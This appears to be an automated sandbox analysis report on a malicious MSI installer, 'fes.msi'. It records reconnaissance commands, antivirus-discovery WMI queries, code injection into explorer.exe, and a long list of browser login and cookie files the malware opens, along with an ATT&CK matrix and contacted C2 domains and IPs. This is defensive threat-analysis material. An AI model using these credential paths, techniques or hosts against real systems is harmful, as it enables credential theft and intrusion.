            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: explorer.exe, 00000009.00000002.4147116004.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143132616.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4141313662.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000009.00000002.4140702532.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4141313662.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4141313662.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD35A9 cpuid 3_2_00CD35A9
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: EnumSystemLocalesW,3_2_00CEE0C6
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: EnumSystemLocalesW,3_2_00CEE1AC
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: EnumSystemLocalesW,3_2_00CEE111
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: EnumSystemLocalesW,3_2_00CE7132
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00CEE237
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: GetLocaleInfoEx,3_2_00CD23F8
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: GetLocaleInfoW,3_2_00CEE48A
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00CEE5B3
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: GetLocaleInfoW,3_2_00CE76AF
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: GetLocaleInfoW,3_2_00CEE6B9
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00CEE788
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW,5_2_000001E51AE19CDC
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,5_2_000001E51AE27140
            Source: C:\Windows\System32\rundll32.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,5_2_000001E51AE0E0FC
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,5_2_000001E51AE2708C
            Source: C:\Windows\System32\rundll32.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_000001E51AE24E7C
            Source: C:\Windows\System32\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_000001E51AE26384
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,5_2_000001E51AE27244
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free,5_2_000001E51AE26218
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,5_2_000001E51AE2F160
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,5_2_000001E51AE27934
            Source: C:\Windows\System32\rundll32.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_000001E51AE24910
            Source: C:\Windows\System32\rundll32.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_000001E51AE255E0
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,5_2_000001E51AE275BC
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,5_2_000001E51AE27704
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,5_2_000001E51AE27670
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,5_2_000001E51AE19C1C
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,5_2_000001E51AE26C20
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,5_2_000001E51AE27BD8
            Source: C:\Windows\System32\rundll32.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_000001E51AE12BC4
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,5_2_000001E51AE1FD38
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,5_2_000001E51AE1CCD0
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,GetLocaleInfoW,5_2_000001E51AE27B30
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_000001E51AE27A80
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,5_2_000001E5190CF5E0
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,5_2_000001E5190D6934
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,wcschr,wcschr,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_getptd,_getptd,LcidFromHexString,5_2_000001E5190D6AEC
            Source: C:\Windows\System32\rundll32.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,5_2_000001E5190BD9A4
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00CD37D5
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E964D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,5_2_000001E51E964D00
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CE7B1F GetTimeZoneInformation,3_2_00CE7B1F
            Source: C:\Windows\explorer.exeCode function: 9_2_0311891C RtlGetVersion,GetVersionExW,9_2_0311891C
            Source: C:\Windows\System32\nltest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: WMIC.exe, 00000022.00000003.3189009496.000001DB51775000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000022.00000003.3187698400.000001DB51762000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189482463.000001DB5176C000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3187769191.000001DB51F71000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3189053647.000001DB5176A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189500617.000001DB51771000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3189029474.000001DB51764000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3188980281.000001DB5176F000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189586670.000001DB51ABB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000022.00000002.3189139165.0000002B36A97000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ndows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000022.00000002.3189586670.000001DB51ABB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000022.00000002.3189586670.000001DB51ABB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000022.00000003.3188407652.000001DB51F51000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3188384094.000001DB51F50000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189419782.000001DB5174B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3187698400.000001DB5174A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3187634548.000001DB51723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\net.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\net.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7192, type: MEMORYSTR
            Source: Yara matchFile source: 00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Windows\explorer.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage29_2_0E628848
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\CookiesJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7192, type: MEMORYSTR
            Source: Yara matchFile source: 00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media
            141
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Native API
            1
            Windows Service
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials In Files
            11
            Peripheral Device Discovery
            Remote Desktop Protocol1
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Service Execution
            Logon Script (Windows)1
            Windows Service
            2
            Obfuscated Files or Information
            Security Account Manager1
            Account Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook813
            Process Injection
            1
            DLL Side-Loading
            NTDS2
            File and Directory Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion
            LSA Secrets158
            System Information Discovery
            SSHKeylogging114
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
            Masquerading
            Cached Domain Credentials1101
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
            Virtualization/Sandbox Evasion
            DCSync13
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job813
            Process Injection
            Proc Filesystem13
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32
            /etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery
            Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging21
            System Network Configuration Discovery
            Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567646 Sample: fes.msi Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 73 vutarf.com 2->73 75 reateberam.com 2->75 77 3 other IPs or domains 2->77 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Antivirus detection for URL or domain 2->89 91 6 other signatures 2->91 11 rundll32.exe 2->11         started        13 msiexec.exe 14 40 2->13         started        17 msiexec.exe 2 2->17         started        signatures3 process4 file5 19 rundll32.exe 8 14 11->19         started        65 C:\Windows\Installer\MSI17D3.tmp, PE32 13->65 dropped 67 C:\Users\user\AppData\Roaming\avutil.dll, PE32+ 13->67 dropped 69 C:\Windows\Installer\MSI16A8.tmp, PE32 13->69 dropped 71 3 other files (none is malicious) 13->71 dropped 113 Drops executables to the windows directory (C:\Windows) and starts them 13->113 23 msiexec.exe 13->23         started        25 MSI17D3.tmp 13->25         started        signatures6 process7 dnsIp8 79 vutarf.com 94.232.43.224, 49732, 6542 WELLWEBNL Russian Federation 19->79 81 huanvn.com 103.57.249.207, 49730, 6542 SITINETWORS-IN-APSITINETWORKSLIMITEDIN India 19->81 93 System process connects to network (likely due to code injection or exploit) 19->93 95 Contains functionality to inject threads in other processes 19->95 97 Injects code into the Windows Explorer (explorer.exe) 19->97 101 5 other signatures 19->101 27 explorer.exe 68 9 19->27 injected 99 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 23->99 signatures9 process10 dnsIp11 83 dogirafer.com 104.21.68.89, 443, 49851, 49861 CLOUDFLARENETUS United States 27->83 103 System process connects to network (likely due to code injection or exploit) 27->103 105 Checks if browser processes are running 27->105 107 Contains functionality to steal Internet Explorer form passwords 27->107 109 Tries to harvest and steal browser information (history, passwords, etc) 27->109 31 cmd.exe 1 27->31         started        34 cmd.exe 1 27->34         started        36 cmd.exe 1 27->36         started        38 8 other processes 27->38 signatures12 process13 signatures14 115 Uses net.exe to modify the status of services 31->115 117 Uses ipconfig to lookup or modify the Windows network settings 31->117 119 Uses whoami command line tool to query computer and username 31->119 40 conhost.exe 31->40         started        42 ipconfig.exe 1 31->42         started        44 systeminfo.exe 2 1 34->44         started        47 conhost.exe 34->47         started        121 Performs a network lookup / discovery via net view 36->121 55 2 other processes 36->55 49 net.exe 38->49         started        51 net.exe 38->51         started        53 conhost.exe 38->53         started        57 13 other processes 38->57 process15 signatures16 111 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 44->111 59 WmiPrvSE.exe 